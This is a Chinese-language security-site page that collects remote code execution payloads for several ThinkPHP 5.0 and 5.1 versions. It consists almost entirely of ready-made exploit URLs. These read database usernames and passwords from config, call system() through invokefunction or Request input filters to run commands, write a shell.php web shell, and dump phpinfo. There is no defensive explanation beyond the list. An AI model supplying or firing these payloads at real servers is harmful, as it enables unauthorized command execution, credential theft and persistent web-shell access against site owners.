1. 极安网首页
  2. 网络安全工具

ThinkPHP远程代码执行漏洞Payload大全

ThinkPHP远程代码执行漏洞Payload大全-极安网

Thinkphp 5.0.22

  1. http://www.secvery.com/thinkphp/public/?s=.|think\config/get&name=database.username
  2. http://www.secvery.com/thinkphp/public/?s=.|think\config/get&name=database.password
  3. https://www.secvery.com/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
  4. https://www.secvery.com/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

Thinkphp 5

  1. https://www.secvery.com/tp5/public/?s=index/\think\View/display&content=%22%3C?%3E%3C?php%20phpinfo();?%3E&data=1

Thinkphp 5.0.21

  1. https://www.secvery.com/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
  2. https://www.secvery.com/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

Thinkphp 5.1.*

  1. https://www.secvery.com/to/thinkphp5.1.29/?s=index/\think\Request/input&filter=phpinfo&data=1
  2. https://www.secvery.com/to/thinkphp5.1.29/?s=index/\think\Request/input&filter=system&data=cmd
  3. https://www.secvery.com/to/thinkphp5.1.29/?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E
  4. https://www.secvery.com/to/thinkphp5.1.29/?s=index/\think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3E
  5. https://www.secvery.com/to/thinkphp5.1.29/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
  6. https://www.secvery.com/to/thinkphp5.1.29/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd
  7. https://www.secvery.com/to/thinkphp5.1.29/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
  8. https://www.secvery.com/to/thinkphp5.1.29/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd

原创文章,作者: Admin ,转载请注明出处:https://secvery.com/1921.html